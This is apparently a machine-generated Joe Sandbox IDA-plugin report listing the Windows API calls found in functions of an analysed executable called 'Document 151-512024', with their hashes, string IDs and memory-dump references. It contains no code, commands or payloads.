                                                                                                    • Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                                                                    • String ID: 0n
                                                                                                    • API String ID: 641708696-3368625520
                                                                                                    • Opcode ID: dbf97b8d1038a6a2245d53661e877ed74c67ff8d7eb998b6892e713a13a2f8be
                                                                                                    • Instruction ID: bfb23ffc1556f9357dfa0ed9d2bc44e54b97901b18f354a4fc1ccff72c60cc22
                                                                                                    • Opcode Fuzzy Hash: dbf97b8d1038a6a2245d53661e877ed74c67ff8d7eb998b6892e713a13a2f8be
                                                                                                    • Instruction Fuzzy Hash: BF61AB30106601DFCF21DF2AD948B6A77F5FB40313F108919E982AB6A0CB35AC89DF90
                                                                                                    APIs
                                                                                                    • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 009BC4B0
                                                                                                    • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 009BC4C3
                                                                                                    • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 009BC4D7
                                                                                                    • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 009BC4F0
                                                                                                    • InternetQueryOptionW.WININET(00000000,0000001F,?,?), ref: 009BC533
                                                                                                    • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 009BC549
                                                                                                    • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 009BC554
                                                                                                    • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 009BC584
                                                                                                    • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 009BC5DC
                                                                                                    • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 009BC5F0
                                                                                                    • InternetCloseHandle.WININET(00000000), ref: 009BC5FB
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Internet$Http$ErrorEventLastOptionQueryRequest$CloseConnectHandleInfoOpenSend
                                                                                                    • String ID:
                                                                                                    • API String ID: 3800310941-3916222277
                                                                                                    • Opcode ID: 3bd5277dbddba92be5c08ba308e604029f8284773ba5e2949943f0ca7e3fd433
                                                                                                    • Instruction ID: 4830540769d0a19dc48365f3bb891f89d542db8fde5502213d49430c274ad310
                                                                                                    • Opcode Fuzzy Hash: 3bd5277dbddba92be5c08ba308e604029f8284773ba5e2949943f0ca7e3fd433
                                                                                                    • Instruction Fuzzy Hash: 7A514BF1545209BFDB219F64CA88AEB7BBCFF48764F00441AF945D6210DB74EA44EBA0
                                                                                                    APIs
                                                                                                      • Part of subcall function 00959944: GetWindowLongW.USER32(?,000000EB), ref: 00959952
                                                                                                    • GetSysColor.USER32(0000000F), ref: 00959862
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ColorLongWindow
                                                                                                    • String ID: 0n
                                                                                                    • API String ID: 259745315-3368625520
                                                                                                    • Opcode ID: cc4dc9b05e735dacb104f91bbd919aa3ec8e6d6ef94f467ec6089c50de1c5a1b
                                                                                                    • Instruction ID: 259edb6207621bb351ea9076ded7b61e5743458ac7bd957dba4e7ba6f336131e
                                                                                                    • Opcode Fuzzy Hash: cc4dc9b05e735dacb104f91bbd919aa3ec8e6d6ef94f467ec6089c50de1c5a1b
                                                                                                    • Instruction Fuzzy Hash: 6D41D471149610EFEF209F799C84BB93B69EB06332F144606FEA28B1E1C7309C85DB11
                                                                                                    APIs
                                                                                                    • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,00000000,?,000000EC), ref: 009D8592
                                                                                                    • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 009D85A2
                                                                                                    • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 009D85AD
                                                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 009D85BA
                                                                                                    • GlobalLock.KERNEL32(00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 009D85C8
                                                                                                    • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 009D85D7
                                                                                                    • GlobalUnlock.KERNEL32(00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 009D85E0
                                                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 009D85E7
                                                                                                    • CreateStreamOnHGlobal.OLE32(00000000,00000001,000000F0,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 009D85F8
                                                                                                    • OleLoadPicture.OLEAUT32(000000F0,00000000,00000000,009DFC38,?), ref: 009D8611
                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 009D8621
                                                                                                    • GetObjectW.GDI32(?,00000018,?), ref: 009D8641
                                                                                                    • CopyImage.USER32(?,00000000,00000000,?,00002000), ref: 009D8671
                                                                                                    • DeleteObject.GDI32(?), ref: 009D8699
                                                                                                    • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 009D86AF
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                                                                    • String ID:
                                                                                                    • API String ID: 3840717409-0
                                                                                                    • Opcode ID: 04cd625237ff3d66e86f04eff33dd7bf891f99433fb771369b9d1216b552c0b8
                                                                                                    • Instruction ID: e437139f1dcbf01d89603ea0ebfb489ac078da978f2c1d488b3102cb16bf6b81
                                                                                                    • Opcode Fuzzy Hash: 04cd625237ff3d66e86f04eff33dd7bf891f99433fb771369b9d1216b552c0b8
                                                                                                    • Instruction Fuzzy Hash: EE4159B1681205AFDB108FA5DC48EAF7BBCEF89751F00815AF915E7260DB30D941DB20
                                                                                                    APIs
                                                                                                    • VariantInit.OLEAUT32(00000000), ref: 009B1502
                                                                                                    • VariantCopy.OLEAUT32(?,?), ref: 009B150B
                                                                                                    • VariantClear.OLEAUT32(?), ref: 009B1517
                                                                                                    • VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 009B15FB
                                                                                                    • VarR8FromDec.OLEAUT32(?,?), ref: 009B1657
                                                                                                    • VariantInit.OLEAUT32(?), ref: 009B1708
                                                                                                    • SysFreeString.OLEAUT32(?), ref: 009B178C
                                                                                                    • VariantClear.OLEAUT32(?), ref: 009B17D8
                                                                                                    • VariantClear.OLEAUT32(?), ref: 009B17E7
                                                                                                    • VariantInit.OLEAUT32(00000000), ref: 009B1823
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem
                                                                                                    • String ID: %4d%02d%02d%02d%02d%02d$Default
                                                                                                    • API String ID: 1234038744-3931177956
                                                                                                    • Opcode ID: 1a1d26c8c70b46834b7a01676cbb86402e23ea9146fe49d57976a24d874af8f1
                                                                                                    • Instruction ID: 9180d8bc21d836e20ff2b3756de0209e491a1b385ddd39bc5783a65948297af9
                                                                                                    • Opcode Fuzzy Hash: 1a1d26c8c70b46834b7a01676cbb86402e23ea9146fe49d57976a24d874af8f1
                                                                                                    • Instruction Fuzzy Hash: 78D14472A00105EBCB20DF65E9A4BBDB7B9BF84720F908556F807AB180DB74DC45DBA1
                                                                                                    APIs
                                                                                                      • Part of subcall function 00949CB3: _wcslen.LIBCMT ref: 00949CBD
                                                                                                      • Part of subcall function 009CC998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,009CB6AE,?,?), ref: 009CC9B5
                                                                                                      • Part of subcall function 009CC998: _wcslen.LIBCMT ref: 009CC9F1
                                                                                                      • Part of subcall function 009CC998: _wcslen.LIBCMT ref: 009CCA68
                                                                                                      • Part of subcall function 009CC998: _wcslen.LIBCMT ref: 009CCA9E
                                                                                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 009CB6F4
                                                                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 009CB772
                                                                                                    • RegDeleteValueW.ADVAPI32(?,?), ref: 009CB80A
                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 009CB87E
                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 009CB89C
                                                                                                    • LoadLibraryA.KERNEL32(advapi32.dll), ref: 009CB8F2
                                                                                                    • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 009CB904
                                                                                                    • RegDeleteKeyW.ADVAPI32(?,?), ref: 009CB922
                                                                                                    • FreeLibrary.KERNEL32(00000000), ref: 009CB983
                                                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 009CB994
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _wcslen$Close$DeleteLibrary$AddressBuffCharConnectFreeLoadOpenProcRegistryUpperValue
                                                                                                    • String ID: RegDeleteKeyExW$advapi32.dll
                                                                                                    • API String ID: 146587525-4033151799
                                                                                                    • Opcode ID: 9637bc06b5b9793c9c2441c0252e123c6448d83b3f3ff81d4982deef5d72ce9f
                                                                                                    • Instruction ID: 57442c9a7b1a41f1d111b82aecb927546ef47abbfc69c7a78bdab2fd6a8c1753
                                                                                                    • Opcode Fuzzy Hash: 9637bc06b5b9793c9c2441c0252e123c6448d83b3f3ff81d4982deef5d72ce9f
                                                                                                    • Instruction Fuzzy Hash: 31C17C70609201AFD714DF24C495F2ABBE5FF84318F14899CF49A8B6A2CB35ED45CB92
                                                                                                    APIs
                                                                                                      • Part of subcall function 00959BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00959BB2
                                                                                                    • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 009D8D5A
                                                                                                    • GetFocus.USER32 ref: 009D8D6A
                                                                                                    • GetDlgCtrlID.USER32(00000000), ref: 009D8D75
                                                                                                    • DefDlgProcW.USER32(?,00000111,?,?,00000000,?,?,?,?,?,?,?), ref: 009D8E1D
                                                                                                    • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 009D8ECF
                                                                                                    • GetMenuItemCount.USER32(?), ref: 009D8EEC
                                                                                                    • GetMenuItemID.USER32(?,00000000), ref: 009D8EFC
                                                                                                    • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 009D8F2E
                                                                                                    • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 009D8F70
                                                                                                    • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 009D8FA1
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow
                                                                                                    • String ID: 0$0n
                                                                                                    • API String ID: 1026556194-2816077665
                                                                                                    • Opcode ID: 0716b4df811e93f6e56df977196a3d6380cc16d0edd1394558a2ee5725c1f83c
                                                                                                    • Instruction ID: ce0d903a832466371ca21972b98787e1cdb574991555312510d39b3efd004778
                                                                                                    • Opcode Fuzzy Hash: 0716b4df811e93f6e56df977196a3d6380cc16d0edd1394558a2ee5725c1f83c
                                                                                                    • Instruction Fuzzy Hash: A281B1B1548301AFD710DF18D884AAB7BEDFB88754F04891EF98497392DB30D941DBA1
                                                                                                    APIs
                                                                                                    • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 009D5504
                                                                                                    • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 009D5515
                                                                                                    • CharNextW.USER32(00000158), ref: 009D5544
                                                                                                    • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 009D5585
                                                                                                    • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 009D559B
                                                                                                    • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 009D55AC
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MessageSend$CharNext
                                                                                                    • String ID: 0n
                                                                                                    • API String ID: 1350042424-3368625520
                                                                                                    • Opcode ID: 124652dd4c8ccae5a4c6f9dcf9ce50288b67d6bc5a5f27beb893a7dc78ea6f58
                                                                                                    • Instruction ID: 132cd103b935987b73208f71792591745ccf5442c6841d7c83ac9d027db937e8
                                                                                                    • Opcode Fuzzy Hash: 124652dd4c8ccae5a4c6f9dcf9ce50288b67d6bc5a5f27beb893a7dc78ea6f58
                                                                                                    • Instruction Fuzzy Hash: 4261AD70984609ABDF108F94CC84EFE7BB9EB09360F51C54BF925A73A0D7748A81DB61
                                                                                                    APIs
                                                                                                    • GetDC.USER32(00000000), ref: 009C25D8
                                                                                                    • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 009C25E8
                                                                                                    • CreateCompatibleDC.GDI32(?), ref: 009C25F4
                                                                                                    • SelectObject.GDI32(00000000,?), ref: 009C2601
                                                                                                    • StretchBlt.GDI32(?,00000000,00000000,?,?,?,00000006,?,?,?,00CC0020), ref: 009C266D
                                                                                                    • GetDIBits.GDI32(?,?,00000000,00000000,00000000,00000028,00000000), ref: 009C26AC
                                                                                                    • GetDIBits.GDI32(?,?,00000000,?,00000000,00000028,00000000), ref: 009C26D0
                                                                                                    • SelectObject.GDI32(?,?), ref: 009C26D8
                                                                                                    • DeleteObject.GDI32(?), ref: 009C26E1
                                                                                                    • DeleteDC.GDI32(?), ref: 009C26E8
                                                                                                    • ReleaseDC.USER32(00000000,?), ref: 009C26F3
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                                                                    • String ID: (
                                                                                                    • API String ID: 2598888154-3887548279
                                                                                                    • Opcode ID: ec48837ba3c1339add5ca4018a05feed0057e67e02815a7443d7da937d44344c
                                                                                                    • Instruction ID: b8b0ff34540dd57a3f95675f001f6178d5ba24f75ca276d01e0039a64c204e8d
                                                                                                    • Opcode Fuzzy Hash: ec48837ba3c1339add5ca4018a05feed0057e67e02815a7443d7da937d44344c
                                                                                                    • Instruction Fuzzy Hash: 196102B5D0421AEFCF04CFA8D984EAEBBB5FF48310F20852AE955A7250D770A941DF60
                                                                                                    APIs
                                                                                                    • ___free_lconv_mon.LIBCMT ref: 0097DAA1
                                                                                                      • Part of subcall function 0097D63C: _free.LIBCMT ref: 0097D659
                                                                                                      • Part of subcall function 0097D63C: _free.LIBCMT ref: 0097D66B
                                                                                                      • Part of subcall function 0097D63C: _free.LIBCMT ref: 0097D67D
                                                                                                      • Part of subcall function 0097D63C: _free.LIBCMT ref: 0097D68F
                                                                                                      • Part of subcall function 0097D63C: _free.LIBCMT ref: 0097D6A1
                                                                                                      • Part of subcall function 0097D63C: _free.LIBCMT ref: 0097D6B3
                                                                                                      • Part of subcall function 0097D63C: _free.LIBCMT ref: 0097D6C5
                                                                                                      • Part of subcall function 0097D63C: _free.LIBCMT ref: 0097D6D7
                                                                                                      • Part of subcall function 0097D63C: _free.LIBCMT ref: 0097D6E9
                                                                                                      • Part of subcall function 0097D63C: _free.LIBCMT ref: 0097D6FB
                                                                                                      • Part of subcall function 0097D63C: _free.LIBCMT ref: 0097D70D
                                                                                                      • Part of subcall function 0097D63C: _free.LIBCMT ref: 0097D71F
                                                                                                      • Part of subcall function 0097D63C: _free.LIBCMT ref: 0097D731
                                                                                                    • _free.LIBCMT ref: 0097DA96
                                                                                                      • Part of subcall function 009729C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0097D7D1,00000000,00000000,00000000,00000000,?,0097D7F8,00000000,00000007,00000000,?,0097DBF5,00000000), ref: 009729DE
                                                                                                      • Part of subcall function 009729C8: GetLastError.KERNEL32(00000000,?,0097D7D1,00000000,00000000,00000000,00000000,?,0097D7F8,00000000,00000007,00000000,?,0097DBF5,00000000,00000000), ref: 009729F0
                                                                                                    • _free.LIBCMT ref: 0097DAB8
                                                                                                    • _free.LIBCMT ref: 0097DACD
                                                                                                    • _free.LIBCMT ref: 0097DAD8
                                                                                                    • _free.LIBCMT ref: 0097DAFA
                                                                                                    • _free.LIBCMT ref: 0097DB0D
                                                                                                    • _free.LIBCMT ref: 0097DB1B
                                                                                                    • _free.LIBCMT ref: 0097DB26
                                                                                                    • _free.LIBCMT ref: 0097DB5E
                                                                                                    • _free.LIBCMT ref: 0097DB65
                                                                                                    • _free.LIBCMT ref: 0097DB82
                                                                                                    • _free.LIBCMT ref: 0097DB9A
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                    • String ID:
                                                                                                    • API String ID: 161543041-0
                                                                                                    • Opcode ID: 4b0b8ee121895b216faa01daf601abde7a3b6de5133172243b1efd74da1876da
                                                                                                    • Instruction ID: 8db7df18c8f5d3368182eb3432e9173b6f4c768def0cc926d560ce70db1a13e7
                                                                                                    • Opcode Fuzzy Hash: 4b0b8ee121895b216faa01daf601abde7a3b6de5133172243b1efd74da1876da
                                                                                                    • Instruction Fuzzy Hash: 333147336052059FEB25AB38E945B5AB7E8FF40320F198829E54CD7191DB30AC808B24
                                                                                                    APIs
                                                                                                    • GetClassNameW.USER32(?,?,00000100), ref: 009A369C
                                                                                                    • _wcslen.LIBCMT ref: 009A36A7
                                                                                                    • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 009A3797
                                                                                                    • GetClassNameW.USER32(?,?,00000400), ref: 009A380C
                                                                                                    • GetDlgCtrlID.USER32(?), ref: 009A385D
                                                                                                    • GetWindowRect.USER32(?,?), ref: 009A3882
                                                                                                    • GetParent.USER32(?), ref: 009A38A0
                                                                                                    • ScreenToClient.USER32(00000000), ref: 009A38A7
                                                                                                    • GetClassNameW.USER32(?,?,00000100), ref: 009A3921
                                                                                                    • GetWindowTextW.USER32(?,?,00000400), ref: 009A395D
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout_wcslen
                                                                                                    • String ID: %s%u
                                                                                                    • API String ID: 4010501982-679674701
                                                                                                    • Opcode ID: 572d943b6ca733762688f456b5f5a5777c20b6dded40bf89aea73707e0e0cc37
                                                                                                    • Instruction ID: 53b0046bccaf663f9452199e12be0ce039962e3716bbdb473e724243efab8a14
                                                                                                    • Opcode Fuzzy Hash: 572d943b6ca733762688f456b5f5a5777c20b6dded40bf89aea73707e0e0cc37
                                                                                                    • Instruction Fuzzy Hash: F991BFB1204606EFDB19DF24C885FAAB7ACFF85354F008629F999D2190DB34EA45CBD1
                                                                                                    APIs
                                                                                                    • GetClassNameW.USER32(?,?,00000400), ref: 009A4994
                                                                                                    • GetWindowTextW.USER32(?,?,00000400), ref: 009A49DA
                                                                                                    • _wcslen.LIBCMT ref: 009A49EB
                                                                                                    • CharUpperBuffW.USER32(?,00000000), ref: 009A49F7
                                                                                                    • _wcsstr.LIBVCRUNTIME ref: 009A4A2C
                                                                                                    • GetClassNameW.USER32(00000018,?,00000400), ref: 009A4A64
                                                                                                    • GetWindowTextW.USER32(?,?,00000400), ref: 009A4A9D
                                                                                                    • GetClassNameW.USER32(00000018,?,00000400), ref: 009A4AE6
                                                                                                    • GetClassNameW.USER32(?,?,00000400), ref: 009A4B20
                                                                                                    • GetWindowRect.USER32(?,?), ref: 009A4B8B
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ClassName$Window$Text$BuffCharRectUpper_wcslen_wcsstr
                                                                                                    • String ID: ThumbnailClass
                                                                                                    • API String ID: 1311036022-1241985126
                                                                                                    • Opcode ID: f367479de144b97999e3c8acc06d97d436975ab89473cd6297643969675d6fdb
                                                                                                    • Instruction ID: 123500cb1de4822c3351ea4ace42817d24d87a5908e2b57b7296e098ff728a9d
                                                                                                    • Opcode Fuzzy Hash: f367479de144b97999e3c8acc06d97d436975ab89473cd6297643969675d6fdb
                                                                                                    • Instruction Fuzzy Hash: 8C919B710082069BDB04CF14C985BAAB7ECFFC6314F04846AFD8A9A196DB70ED45CBE1
                                                                                                    APIs
                                                                                                    • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 009D3A9D
